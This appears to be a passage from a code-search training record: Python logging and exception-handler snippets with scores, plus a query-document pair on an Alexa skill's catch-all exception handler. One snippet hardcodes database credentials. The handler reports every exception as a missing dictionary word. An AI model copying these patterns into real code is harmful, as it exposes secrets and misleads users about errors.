list()\n extra = dict()\n for key, value in fmt_info:\n values.append(value)\n\n if key.__class__ is str:\n extra[key] = value\n else:\n extra[key[0]] = {key[1]: value}\n\n self.logger.info(\n self.colorize_msg(\n str(response.status), self._log_format % tuple(values),\n ),\n extra=extra\n )\n\n except Exception:\n self.logger.exception(\"Error in logging\")", "def log_response(handler_input, response):\n # type: (HandlerInput, Response) -> None\n print(\"Alexa Response: {}\\n\".format(response))", "def log_response(handler_input, response):\n # type: (HandlerInput, Response) -> None\n print(\"Alexa Response: {}\\n\".format(response))", "def log_response(handler_input, response):\n # type: (HandlerInput, Response) -> None\n print(\"Alexa Response: {}\\n\".format(response))", "def addLogEvent(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def log_api():\n try:\n redis.zincrby(REDIS_LOG_KEY_NAME, 1, request.path)\n except RedisError as exc:\n return exc", "def log():\n data = {}\n log = {}\n log['dia'] = date.today().strftime(\"%d/%m/%Y\")\n log['info'] = ('Rooms IP: %s %s %s')%(request.remote_addr,request.method, request.url)\n data['data'] = log\n try:\n r = requests.post(uri, json=data)\n except requests.exceptions.RequestException as e:\n print(e)\n print(\"\\n\\nThe microservice Log is unvailable. The Log is %s.\"%(log['info']))\n else:\n if r.status_code == 200:\n print(\"Register Log was a success\")\n else:\n print(\"Register Log was an unsuccess\")", "def log(self, message):", "def emit(self, record):\n log_entry = self.format(record)\n try: \n requests.post(self.host+self.url, log_entry,headers={\"Content-type\": \"application/json\"}).content\n except Exception as e:\n if self.debug:\n print(e)", "def log(self, *args):\n self._check_private_key(\"log data\")\n params = {'private_key': self.privateKey}\n params.update(dict((k, self._encoder.serialize(v))\n for k, v in zip(self.fields, args)))\n response = self._post(self.inputUrl(), params=params)\n\n self._last_headers = response.headers\n self._stats = None", "def access(self, resp, req, environ, request_time):\n if not (self.cfg.accesslog or self.cfg.logconfig or self.cfg.syslog):\n return\n\n atoms = self.atoms(resp, req, environ, request_time)\n\n # wrap atoms:\n # - make sure atoms will be tested properly\n # - if atom doesn't exist replace it by '-'\n safe_atoms = self.atoms_wrapper_class(atoms)\n safe_atoms = self.colorize_atoms(safe_atoms)\n try:\n msg = self.cfg.access_log_format % safe_atoms\n self.access_log.info(self.colorize_msg(atoms['s'], msg))\n except:\n self.error(traceback.format_exc())", "def _addLogEntry(request, action, pagename, filename):\n from MoinMoin.logfile import editlog\n t = wikiutil.timestamp2version(time.time())\n fname = wikiutil.url_quote(filename)\n\n # Write to global log\n log = editlog.EditLog(request)\n log.add(request, t, 99999999, action, pagename, request.remote_addr, fname)\n\n # Write to local log\n log = editlog.EditLog(request, rootpagename=pagename)\n log.add(request, t, 99999999, action, pagename, request.remote_addr, fname)", "def log_requests(response):\n ts = strftime('[%Y-%b-%d %H:%M-%S]')\n\n logger.info('Flask: {0} {1} {2} {3} {4} {5}'.\n format(ts, request.remote_addr, request.method, request.scheme, request.full_path, response.status))\n\n return response", "async def _write_preflight_log(self, command_name, command):\n logging.info('Action submitted: [%s] [%s]', command_name,\n json.dumps(command))", "def _trace(self):\n self.__aceQLHttpApi.trace()", "def log_message(self, format, *args):\n logger.info(\"client: %s request: %s\"\n % (self.address_string(), format % args))", "def __init__(self, request, log=\"\"):\n self.log = log\n self.request = request", "def process_request(self, request):\n # Initialize thread local storage\n threadlocal.auditlog = {\n 'signal_duid': (self.__class__, time.time()),\n 'remote_addr': request.META.get('REMOTE_ADDR'),\n }\n\n # In case of proxy, set 'original' address\n if request.META.get('HTTP_X_FORWARDED_FOR'):\n threadlocal.auditlog['remote_addr'] = request.META.get('HTTP_X_FORWARDED_FOR').split(',')[0]\n\n # Connect signal for automatic logging\n if hasattr(request, 'user') and hasattr(request.user, 'is_authenticated') and request.user.is_authenticated():\n set_actor = curry(self.set_actor, user=request.user, signal_duid=threadlocal.auditlog['signal_duid'])\n pre_save.connect(set_actor, sender=LogEntry, dispatch_uid=threadlocal.auditlog['signal_duid'], weak=False)", "def log_request(req: 'flask_request', res: str) -> None:\n #raise Exception(\"Something awful just happened.\")\n #sleep(15)\n try:\n with UseDatabase(app.config['dbconfig']) as cursor:\n _SQL = \"\"\"insert into log\n (phrase, letters, ip, browser_string, results)\n values\n (%s, %s, %s, %s, %s)\"\"\"\n cursor.execute(_SQL, (req.form['phrase'],\n req.form['letters'],\n req.remote_addr,\n req.user_agent.browser,\n res))\n except ConnectionError as err:\n print('Is your database switched on? Error:', str(err))\n except CredentialsError as err:\n print('Is your credentials correct? Error:', str(err))\n except SQLError as err:\n print('Is your query correct? Error:', str(err))\n except Exception as err:\n print('Something went wrong:', str(err))\n return 'Error'", "def _log_throttled_access(self, request):\n request_method = request.method.lower()\n self._meta.throttle.accessed(self._meta.authentication.get_identifier(request), url=request.get_full_path(), request_method=request_method)", "def log_request(self, key, path, headers, body):\n\n if not body:\n body = {}\n # Build a dict with key, headers and body.\n now = datetime.datetime.now().isoformat()\n data = {'request_id': key, 'body': body, 'path': path, 'created': now}\n for k, v in headers.items():\n data[k] = v\n # Put to Dynamodb as a separated thread.\n threading.Thread(target=put_to_dynamodb, args=(data,)).start()", "def log(cls, request, action, arguments=None):\n al = cls(user=request.amo_user, action=action.id)\n al.arguments = arguments\n al.save()\n\n if not isinstance(arguments, (list, tuple)):\n arguments = (arguments,)\n for arg in arguments:\n if isinstance(arg, Addon):\n AddonLog(addon=arg, activity_log=al).save()\n elif isinstance(arg, UserProfile):\n # Index by any user who is mentioned as an argument.\n UserLog(activity_log=al, user=arg).save()\n\n # Index by every request user\n UserLog(activity_log=al, user=request.amo_user).save()", "def on_x(self):\r\n self.log()", "def enable_activity_log(self):\n self.add_payload('createActivityLog', 'true')", "def debug_requests_on():\n HTTPConnection.debuglevel = 2\n\n logging.basicConfig(filename='example1.log', filemode='w', level=logging.INFO, format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\n logging.getLogger().setLevel(logging.DEBUG)\n\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\n requests_log.setLevel(logging.DEBUG)\n requests_log.propagate = True", "def log_event(event):\n LOGGER.info(\"====================================================\")\n LOGGER.info(event)\n LOGGER.info(\"====================================================\")", "def on_start(self):\r\n self.log()", "def log(self, message: str):", "def logIt(self, astr, prefix=\" [D] \"):\n self.protocol.logIt(astr, prefix=prefix)", "def log(self, *args, **kwargs):\n self.game_view.log(*args, **kwargs)", "def log_access():\n # todo use project prefix\n tail('/var/log/nginx/access.log')", "def log(self, msg):\n\n\t\tself.eyetribe.log_message(msg)", "def log(self, reward, action):\n self.logs.append([reward, action])", "def LogData(\n serverName: str, pubIp: str, apiName: str, result,\n request: dict):\n log_id = str(uuid.uuid4())\n dateTime = str(datetime.today())\n if \"Image\" in request:\n request['Image'] = str(request['Image'])\n if \"File\" in request:\n request['File'] = str(request['File'])\n\n paramData = json.dumps(request)\n errorInfo = sys.exc_info()\n errorMessage = \"\"\n if errorInfo[2] is not None:\n errorMessage = f'Error at lineNumber: {str(errorInfo[2].tb_lineno)} {str(errorInfo[0])} {str(errorInfo[1])}'\n info = {\n \"log_Id\": log_id, \"ServerName\": serverName, \"DateTime\": dateTime,\n \"PublicIP\": pubIp, \"APIName\": apiName,\n \"Result\": errorMessage + str(result), \"ParameterData\": str(paramData)\n\n }\n logger = logging.getLogger(__name__)\n logger.info(f'{info}')\n return log_id", "def postLogging(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _log(self, message):\n pass", "def rest_api_log(self):\n with self.resource_lock:\n pass", "def log_event(event):\r\n tracker.send(event)", "def logtool(self, action, **options):\n pass", "def logevent(self, event, request = None, fields={}):\n # convert it to an event if its just a plain string\n if (isinstance(event, basestring)):\n event = EDebug(event,fields=fields)\n # add request field (if it wasn't already set in mevent)\n if (request != None):\n missingfields = { 'request': request }\n event.mergemissings(missingfields)\n # log it\n self.comp('logmanager').process(event)", "def log(self, trace: CallTrace) -> None:\n pass", "def create_audit_log_for_request(response):\n try:\n method = flask.request.method\n endpoint = flask.request.path\n audit_data = getattr(flask.g, \"audit_data\", {})\n request_url = endpoint\n if flask.request.query_string:\n # could use `flask.request.url` but we don't want the root URL\n request_url += f\"?{flask.request.query_string.decode('utf-8')}\"\n\n if method == \"GET\" and endpoint.startswith(\"/data/download/\"):\n flask.current_app.audit_service_client.create_presigned_url_log(\n status_code=response.status_code,\n request_url=request_url,\n guid=endpoint[len(\"/data/download/\") :],\n action=\"download\",\n **audit_data,\n )\n elif method == \"GET\" and endpoint.startswith(\"/login/\"):\n request_url = _clean_authorization_request_url(request_url)\n if audit_data: # ignore login calls with no `username`/`sub`/`idp`\n flask.current_app.audit_service_client.create_login_log(\n status_code=response.status_code,\n request_url=request_url,\n **audit_data,\n )\n except Exception:\n # TODO monitor this somehow\n traceback.print_exc()\n logger.error(f\"!!! Unable to create audit log! Returning response anyway...\")\n\n return response", "def on_L1(self):\r\n self.log()", "def log_process():\n global logger\n\n p = reqparse.RequestParser()\n\n # answer when requested as json in a post\n p.add_argument('tool_id' , type=str, location='json')\n p.add_argument('api_key', type=str, location='json')\n p.add_argument('message', type=str, location='json')\n \n # get passed params \n args = p.parse_args()\n\n args.setdefault('api_key','')\n args.setdefault('message','')\n args.setdefault('tool_id','')\n\n if (args['api_key'] != api_key):\n return log_respond(1,'api_key invalid')\n\n logger.info('tool_id:' + args['tool_id'] + ',' + args['message'])\n\n return log_respond(0,'ok: log posted')", "def _log(self, data):\n if self.log_data is not None:\n self.log_data(data)", "def getLogEvents(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def service_panel_eventlog(self, call):\r\n _LOGGER.debug(\"alarm control panel received event log request\")\r\n if type(call.data) is dict or str(type(call.data)) == \"<class 'mappingproxy'>\":\r\n code = \"\"\r\n if ATTR_CODE in call.data:\r\n code = call.data[ATTR_CODE]\r\n _LOGGER.debug(\"alarm control panel making event log request\")\r\n ##self.hass.data[DOMAIN][\"command_queue\"].put_nowait([\"eventlog\", self.decode_code(code)])\r\n if self.visprotocol is not None:\r\n self.visprotocol.GetEventLog(self.decode_code(code))\r\n # self.process_command([\"eventlog\", self.decode_code(code)])\r\n else:\r\n _LOGGER.debug(\"alarm control panel not making event log request %s %s\", type(call.data), call.data)", "def handle_error(self, request, error):\n self.log.error(\"An error occurred at request \" + repr(request) + \": \" + repr(error))", "def log_info(self, line):\n logging.info(\"Telemetry Logger - %s\" % line)", "def __call__(self, *args, **kwargs):\n self.logger.info(*args, **kwargs)", "def _logRequestArgs(self, request):\n\t\ttry:\n\t\t\tif request.args:\n\t\t\t\t# even if there are args, don't log them if only boring ones\n\t\t\t\t# were given\n\t\t\t\tfmtArgs = _formatRequestArgs(request.args)\n\t\t\t\tif fmtArgs!='{}':\n\t\t\t\t\tlog.msg(\"# Processing starts: %s %s\"%(request.path, \n\t\t\t\t\t\tfmtArgs))\n\t\texcept: # don't fail because of logging problems\n\t\t\tbase.ui.notifyError(\"Formatting of request args failed.\")", "def emit(self, record):\n data = getattr(record, 'synchrolog', {})\n if not data:\n return\n\n url = data.pop('url', None)\n\n if not url:\n return\n\n headers = {'Authorization': f'Basic {self.access_token}'}\n response = requests.post(url=url, json=data, headers=headers)\n if response.status_code >= 400:\n print('Could not send logging info to synchrolog server\\n\\n', response.text)", "def _log(log_fn, task_request, message):\n log_fn(\"{}: {}\".format(task_request.id, message))", "def setup_logfile():\r\n from core.general.appinit import log_init\r\n log_init(\r\n 'general',\r\n 'django_api'\r\n )", "def log(self,):\n if self.request.user.is_anonymous():\n self.fail()\n else:\n self.success()\n if conf.LOGIN_GUARD_FREQUENCY_ALERT_ON:\n self.alert()", "def trace(self, s):\n self.__aceQLHttpApi.trace(s)", "def _log_response(*, log_path: Path, ip_dict: Dict[str, int], response: Response) -> None:\n LOGGER.info(f\"logged request: {response.url}\")\n with log_path.open(mode=\"a\", encoding=\"utf-8\") as f:\n all_responses = [response]\n\n # Poll and wait for operations, if applicable\n is_operation_request = bool(\n re.match(re.compile(\".*/api/versioned/v1/operations/.*\"), response.url)\n )\n is_get_request = response.request.method == \"GET\"\n if is_get_request and is_operation_request:\n wait_resp = _collect_operation_calls(response=response)\n all_responses.extend(wait_resp)\n\n all_json = [_response_to_json(r, ip_dict) for r in all_responses]\n f.writelines([f\"{j}\\n\" for j in all_json])", "def plain(self, *args):\n self.mylog.log(logging.INFO + 1, *args)", "def _info(self, func):\n self.logger.info(\"llamando a %s\" % func)", "def log_response(task_request, response):\n msg = \"{0.status_code} {0.reason} for {0.url}: {0.content}\".format(response)\n log_info(task_request, msg)", "def log_request(req: 'Flask_Request', results: str) -> None:\n\n with UseDatabase(app.config['dbconfig']) as cursor:\n _SQL_INSERT = \"\"\"insert into log_table\n (phrase, letters, ip, browser_string, results)\n values\n (?, ?, ?, ?, ?)\"\"\"\n\n cursor.execute(_SQL_INSERT,\n (req.form['phrase'], req.form['letter'], req.remote_addr, req.user_agent.browser,\n results,))", "def log_route():\n return send_file(path.join('..', 'app.log'), as_attachment=True)", "def event_log(self):\n pass", "def log_debug(self, line):\n logging.debug(\"Telemetry Logger - %s\" % line)", "def log_request(ingredient_list):\n logPath = getLogPath()\n ingredient_string = \"\".join([str(i) for i in ingredient_list])\n with open(logPath, 'a') as log:\n log.write(ingredient_string)\n log.write(\"\\n\")", "def log_exception(*args, **kwds):\n import logging\n logging.exception('Exception in request:')", "async def _request_started(self, request: Request):\n # When we consume the body, we replace the streaming mechanism with\n # a mocked version -- this workaround came from\n # https://github.com/encode/starlette/issues/495#issuecomment-513138055\n # and we call the workaround here to make sure that regardless of\n # `capture_body` settings, we will have access to the body if we need it.\n if self.client.config.capture_body != \"off\":\n await get_body(request)\n\n trace_parent = TraceParent.from_headers(dict(request.headers))\n self.client.begin_transaction(\"request\", trace_parent=trace_parent)\n\n await set_context(lambda: get_data_from_request(request, self.client.config, constants.TRANSACTION), \"request\")\n transaction_name = self.get_route_name(request) or request.url.path\n elasticapm.set_transaction_name(\"{} {}\".format(request.method, transaction_name), override=False)", "def dump_to_log(self):\n # self._send_request(\"/dumpToLog\")\n pass", "def before():\n app.logger.info(\"Local Timestamp: {}\".format(str(datetime.now())))\n app.logger.info(\"Request Method: {}\".format(request.method))\n app.logger.info(\"Request URL: {}\".format(request.url))\n app.logger.info(\"Request Access Route: {}\".format(request.access_route[0]))\n headers = \"\"\n for (key, value) in request.headers:\n # hide authorization header from logs\n if key == \"Authorization\":\n value = \"[provided]\" \n headers += \"{}: {}\\n\".format(key, value)\n app.logger.info(\"Request Headers:{}\\n{}\\n{}\".format(\"-\"*45,str(headers)[:-1], \"-\"*60))\n body = copy.deepcopy(request.json)\n if type(body) is dict and \"password\" in body:\n body['password'] = \"[provided]\"\n app.logger.info(\"Request Body: {}\".format(body))", "def log_login(sender, request, user, **kwargs):\n stracks.user(user).log(\"? has logged in\", action=stracks.login())", "def log_request(req: 'flask_request', res: str) -> None:\n\n _DBCONFIG = {'user': 'vsearch',\n 'password': 'vsearchpasswd',\n 'host': 'hfrey.de',\n 'database': 'vsearchlogDB'}\n\n conn = mysql.connector.connect(**_DBCONFIG)\n cursor = conn.cursor()\n\n _SQL = \"\"\"insert into log (phrase, letters, ip, browser_string, results)\n values\n (%s, %s, %s, %s, %s)\"\"\"\n cursor.execute(_SQL, (req.form['phrase'], req.form['letters'], req.remote_addr, req.user_agent.browser, res, ))\n\n cursor.close()\n conn.commit()\n conn.close()", "def after_request(response):\n logger = logging.getLogger(\"app.access\")\n logger.info(\n \"%s [%s] %s %s %s %s %s %s %s\",\n request.remote_addr,\n dt.utcnow().strftime(\"%d/%b/%Y:%H:%M:%S.%f\")[:-3],\n request.method,\n request.path,\n request.scheme,\n response.status,\n response.content_length,\n request.referrer,\n request.user_agent,\n )\n return response", "def log(a):", "def addLog(self, userId):\n user = [str(userId), 0]\n self.requestLog.append(user)", "def log_data(self):\n\n assert self.tello is not None\n self.tello.subscribe(self.tello.EVENT_LOG_DATA, self.log_handler)\n self.tello.subscribe(self.tello.EVENT_FLIGHT_DATA, self.log_handler)\n self.tello.subscribe(self.tello.EVENT_FILE_RECEIVED, self.log_handler)", "def getLog(request):\n # TODO: GET\n data = {}\n return data", "def alexa_handler(event, context, env_vars=None):\n\n if env_vars is None: # pragma: no cover\n env_vars = os.environ\n\n setup_logging()\n\n # If calling from a scheduled event, this is only a 'warmup' call\n if event.get('detail-type') == 'Scheduled Event':\n logging.info('Warmup only, returning early')\n return\n\n logging.debug('Event:\\n%s', json.dumps(event))\n\n latitude, longitude = get_geo_coordinates(event=event)\n response = query_dark_sky(latitude, longitude)\n weather = parse_weather(response)\n to_speak = build_text_to_speak(weather)\n\n return {\n 'version': '1.0',\n 'response': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': to_speak\n }\n }\n }", "def setup_logger():\n now = datetime.now()\n logging.basicConfig(level=logging.DEBUG)\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n logging.info(f\"Script run on: {now}\")", "def log(self, obj, action):\n action_dict = {'time': time.time(),\n 'action': action}\n self.log_data[obj.get_obj_id()]['actions'].append(action_dict)" ]
[ "0.68515676", "0.6780339", "0.6731675", "0.67187905", "0.6713761", "0.6655223", "0.66517013", "0.64173084", "0.6374145", "0.63045406", "0.6302998", "0.6223099", "0.62073785", "0.6184737", "0.61604834", "0.6096278", "0.6084718", "0.60662866", "0.60651225", "0.59968835", "0.59400016", "0.59400016", "0.59400016", "0.59150136", "0.59117985", "0.58781344", "0.5867439", "0.580209", "0.57844836", "0.576162", "0.5731217", "0.5719896", "0.5701477", "0.56761444", "0.5669072", "0.5665762", "0.5661233", "0.5638384", "0.56364477", "0.5625002", "0.5619377", "0.5610705", "0.5594473", "0.55890226", "0.55877393", "0.55695444", "0.5552156", "0.5537705", "0.55361223", "0.55314237", "0.5511112", "0.54975665", "0.54966867", "0.54952866", "0.5493595", "0.5493311", "0.5475885", "0.5463713", "0.5457853", "0.54571176", "0.54557854", "0.5449945", "0.54395866", "0.54349023", "0.5432736", "0.54150796", "0.54074365", "0.5405932", "0.53953964", "0.53925383", "0.5379017", "0.53729403", "0.5367559", "0.5346012", "0.5328533", "0.5313757", "0.52985847", "0.52980983", "0.52960205", "0.5292011", "0.5265793", "0.5264433", "0.5252554", "0.5237796", "0.5235913", "0.5232609", "0.52215797", "0.52215755", "0.52205765", "0.52178335", "0.5217022", "0.5200328", "0.51966155", "0.5191528", "0.5185677", "0.51837444", "0.5183283", "0.5182779" ]
0.7240547
2
Catch all exception handler, log exception and respond with custom message.
def all_exception_handler(handler_input, exception): # type: (HandlerInput, Exception) -> None print("Encountered following exception: {}".format(exception)) speech = "That word is not in the dictionary. Please choose another word." handler_input.response_builder.speak(speech).ask(speech) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def all_exception_handler(handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n speech = \"Sorry, an exception occurred. Please say again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n return handler_input.response_builder.response", "def all_exception_handler(handler_input, exception):\n return exception_request(handler_input, exception, logger)", "def exception_handler(self, exception):\n pass", "def all_exception_handler(handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speech = \"Sorry, there was some problem. Please try again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response", "def _default_error_handler(self, exception):\n\n self.log.error(exception)\n return '', 500", "def _exception_handler(self, loop: asyncio.AbstractEventLoop, context: dict):\n try:\n if 'exception' in context:\n exc = context['exception']\n print('Uncaught exception %s' % exc, file=sys.stderr)\n print(traceback.format_tb(exc.__traceback__), file=sys.stderr)\n if not self._ignore_exceptions:\n self.shutdown(1)\n else:\n print('Uncaught exception with unknown type ignored', file=sys.stderr)\n except:\n print('Something went seriously wrong. Error in error handler.', file=sys.stderr)\n print(context, file=sys.stderr)\n print(traceback.format_exc(), file=sys.stderr)", "def all_exception_handler(handler_input, exception):\n # type: (HandlerInput, Exception) -> None\n print(\"Encountered following exception: {}\".format(exception))\n\n speech = \"Sorry, there was some problem. Please try again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response", "def log_uncaught_exceptions(handler, registry):\n\n def log_uncaught_exceptions_tween(request):\n try:\n return handler(request)\n except WSGIHTTPException:\n raise\n except Exception:\n logger = get_logger(request)\n # We don't want to write arbitrary user-provided data into the\n # the logfiles. For example, the sort of data that might show\n # up in the payload of a ValueError exception.\n # Format the traceback using standard printing, but use repr()\n # on the exception value itself to avoid this issue.\n exc_type, exc_val, exc_tb = sys.exc_info()\n lines = [\"Uncaught exception while processing request:\\n\"]\n lines.append(\"%s %s\\n\" % (request.method, request.path_url))\n lines.extend(traceback.format_tb(exc_tb))\n lines.append(\"%r\\n\" % (exc_type,))\n lines.append(\"%r\\n\" % (exc_val,))\n logger.exception(\"\".join(lines))\n raise\n\n return log_uncaught_exceptions_tween", "def _catch_exceptions(self, exctype, value, tb):\n\n # Now we log it.\n self.error(\"Uncaught exception\", exc_info=(exctype, value, tb))\n\n # First, we print to stdout with some colouring.\n print_exception_formatted(exctype, value, tb)", "def handle_exceptions(\n generic_message='An error has occurred',\n status_code=500,\n error_handler=None):\n @web.middleware\n async def middleware(request, handler):\n try:\n response = await handler(request)\n return response\n except web.HTTPException:\n raise\n except Exception as ex:\n message = str(ex)\n if error_handler:\n error_handler(request, ex)\n logging.exception('Error: %s', message)\n return web.json_response(\n {'error': generic_message},\n status=status_code\n )\n return middleware", "def custom_exception_handler(exception, context):\n # Call REST framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler(exception, context)\n\n LOGGER.exception(exception)\n\n return response", "def _exception_dispatcher(self, e):\n # TODO Currently not doing anything\n raise e", "def handle_exception(e):\n print(e)\n return error()", "def register_error_handlers(self):\n\n def error_handler(error):\n if not isinstance(error, exceptions.HTTPException):\n error = exceptions.InternalServerError()\n return response.Response(bootstrap.card(body=_.span[_.p(style='color:#888')[error.description or ''],\n _.img(src=flask.url_for('mara_app.static',\n filename='mara.jpg'),\n style='margin-top:30px;max-width:100%;')]),\n title=f'{error.code} {error.name}',\n status=error.code)\n\n for cls in exceptions.HTTPException.__subclasses__():\n self.register_error_handler(cls, error_handler)", "def exceptions(e):\n ts = strftime('[%Y-%b-%d %H:%M]')\n tb = format_exc()\n app.logger.error('%s %s %s %s %s 5xx INTERNAL SERVER ERROR\\n%s',\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n tb)\n return jsonify(message=\"Internal Server Error\"), 500", "async def instana_exception_handler(request, exc):\n try:\n span = async_tracer.active_span\n\n if span is not None:\n if hasattr(exc, 'detail') and (500 <= exc.status_code <= 599):\n span.set_tag('http.error', exc.detail)\n span.set_tag('http.status_code', exc.status_code)\n except Exception:\n logger.debug(\"FastAPI instana_exception_handler: \", exc_info=True)\n\n return await http_exception_handler(request, exc)", "def exception(self, *args, **kwargs):\n\n message = self.get_message(*args, **kwargs)\n self.logger.exception(message)", "def handle_exception(self, exception, debug_mode): # pylint: disable-msg=C0103\n self.error(500)\n logger = logging\n if self.fsm:\n logger = self.fsm.logger\n logger.exception(\"FSMHandler caught Exception\")\n if debug_mode:\n import traceback, sys, cgi\n\n lines = ''.join(traceback.format_exception(*sys.exc_info()))\n self.response.clear()\n self.response.out.write('<pre>%s</pre>' % (cgi.escape(lines, quote=True)))", "def handle_exception(self, exception, debug):\n if isinstance(exception, webapp2.HTTPException):\n self._RawWrite(\"%d %s\" % (exception.code, exception.title))\n self.response.set_status(exception.code)\n else:\n logging.exception(exception)\n self._RawWrite(\"500 Server Error\")\n self.response.set_status(500)", "def root_simple_error_handler(exc, *args, app_name=''):\n\n #print('args',args)\n check_exception = 0\n for each_args in args:\n #print('each_args',each_args['view'].__module__)\n if each_args['view'].__module__ == 'hrms.views' or each_args['view'].__module__ == 'pms.views':\n #print('ok')\n check_exception = 1\n if isinstance(exc,ValidationError):\n print('ValidationError',exc)\n print('ValidationError',exc.get_codes())\n #n = dict(exc.detail)\n headers = {}\n if check_exception == 1:\n return Response({'error': exc.detail},status=exc.status_code,headers=headers)\n else:\n return Response(exc.detail,status=exc.status_code,headers=headers)\n\n elif isinstance(exc, exceptions.APIException):\n print('APIException',exc.get_full_details())\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['X-Throttle-Wait-Seconds'] = '%d' % exc.wait\n print('exc.detail',exc.detail)\n if check_exception == 1:\n return Response({'error': exc.detail},status=exc.status_code,headers=headers)\n else:\n return Response(exc.detail,status=exc.status_code,headers=headers)\n\n elif isinstance(exc, Http404):\n print('Http404')\n if check_exception == 1:\n return Response({'error': 'Not found'},status=status.HTTP_404_NOT_FOUND)\n else:\n return Response('Not found',status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n print('PermissionDenied')\n if check_exception == 1:\n return Response({'error': 'Permission denied'},\n status=status.HTTP_403_FORBIDDEN)\n else:\n return Response('Permission denied',status=status.HTTP_403_FORBIDDEN)\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def handle_exception(self, exception, debug):\n if isinstance(exception, webapp2.HTTPException):\n context = {'error': \"%d %s\" % (exception.code, exception.title), 'detail': exception.detail}\n self.response.set_status(exception.code)\n else:\n logging.exception(exception)\n context = {'error': \"500 Server Error\"}\n self.response.set_status(500)\n return self.render_json(context)", "def generic_exception_handler( exc, context ):\n # Call REST framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler( exc, context )\n\n if isinstance( exc, Http_error ):\n response = Response( exc.context, status=exc.status_code )\n set_rollback()\n\n return response", "def handle_error(self, err): # pragma: no cover\n # log every exception raised in the application\n print('we ended up in the API handle_error()', err, err.__class__)\n\n # catch other HTTP errors\n if isinstance(err, HTTPException):\n original = getattr(err, \"original_exception\", None)\n return jsonify({\n 'success': False,\n 'error': err.code,\n \"message\": getattr(err.error, 'message')\n }), err.code\n\n # if 'message' attribute isn't set, assume it's a core Python exception\n if not getattr(err, 'message', None):\n original = getattr(err, \"original_exception\", None)\n return jsonify({\n 'message': 'Server has encountered an unknown error'\n }), 500\n\n # Handle application-specific custom exceptions\n return jsonify(**err.kwargs), err.http_status_code", "def exceptions(e):\n # NOTE: add log entry\n str(getattr(e, \"code\", \"unavailable\"))\n log_error_code = str(getattr(e, \"code\", \"unavailable\"))\n service_log.error(\n f\"{request.remote_addr} {request.method} {request.scheme} {request.full_path}\\n\"\n f\"Error code: {log_error_code}\\n\"\n f\"Stack trace: {traceback.format_exc()}\"\n )\n\n # NOTE: craft user messages\n if hasattr(e, \"code\"):\n code = int(e.code)\n\n # NOTE: return an http error for methods with no body allowed. This prevents undesired exceptions.\n NO_PAYLOAD_METHODS = \"HEAD\"\n if request.method in NO_PAYLOAD_METHODS:\n return Response(status=code)\n\n error: ServiceError\n if code == 400:\n error = ProgramHttpRequestError(e)\n elif code == 404:\n error = ProgramHttpMissingError(e)\n elif code == 405:\n error = ProgramHttpMethodError(e)\n elif code == 408:\n error = ProgramHttpTimeoutError(e)\n else:\n error = ProgramHttpServerError(e, code)\n\n return error_response(error)\n\n # NOTE: Werkzeug exceptions should be covered above, the following line is for\n # unexpected HTTP server errors.\n return error_response(e)", "def log_exception(*args, **kwds):\n import logging\n logging.exception('Exception in request:')", "def custom_exception_handler(exc, context):\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n # Use the manually set message if it exists.\n if hasattr(exc, \"message\"):\n message = exc.message or ''\n # Otherwise construct the message from the details.\n else:\n message = ''\n for key in exc.detail:\n try:\n if isinstance(exc.detail[key], str):\n message += exc.detail[key] + ' '\n else:\n for error in exc.detail[key]:\n # Exclude duplicates.\n if error not in message:\n message += error + ' '\n except TypeError:\n if key == 'non_field_errors':\n message = exc.detail[key][0]\n else:\n message = _('Invalid request.')\n\n # Remove trailing whitespace.\n if message.endswith(' '):\n message = message[:-1]\n\n data = OrderedDict([\n ('status', 'error'), ('message', message), ('data', exc.detail)\n ])\n else:\n data = OrderedDict([('status', 'error'), ('message', exc.detail)])\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n elif isinstance(exc, Http404):\n msg = _('Not found.')\n data = {'status': 'error', 'message': msg}\n\n set_rollback()\n return Response(data, status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n msg = _('Permission denied.')\n data = {'status': 'error', 'message': msg}\n\n set_rollback()\n return Response(data, status=status.HTTP_403_FORBIDDEN)\n\n elif isinstance(exc, DjangoBaseException):\n data = {'status': 'error', 'message': exc.default_detail}\n\n set_rollback()\n return Response(data, status=exc.status_code)\n\n # If debug is false return a formatted error and raise an internal error.\n if not settings.DEBUG:\n logger.exception(exc)\n exc = DjangoBaseException()\n return Response(\n {'status': 'error', 'message': exc.default_detail},\n status=exc.status_code\n )\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def add_app_exception_handlers(app: Flask):\n\n from anubis.utils.http import error_response\n from anubis.utils.logging import logger\n\n # Set AuthenticationError handler\n @app.errorhandler(AuthenticationError)\n def handler_authentication_error(e: 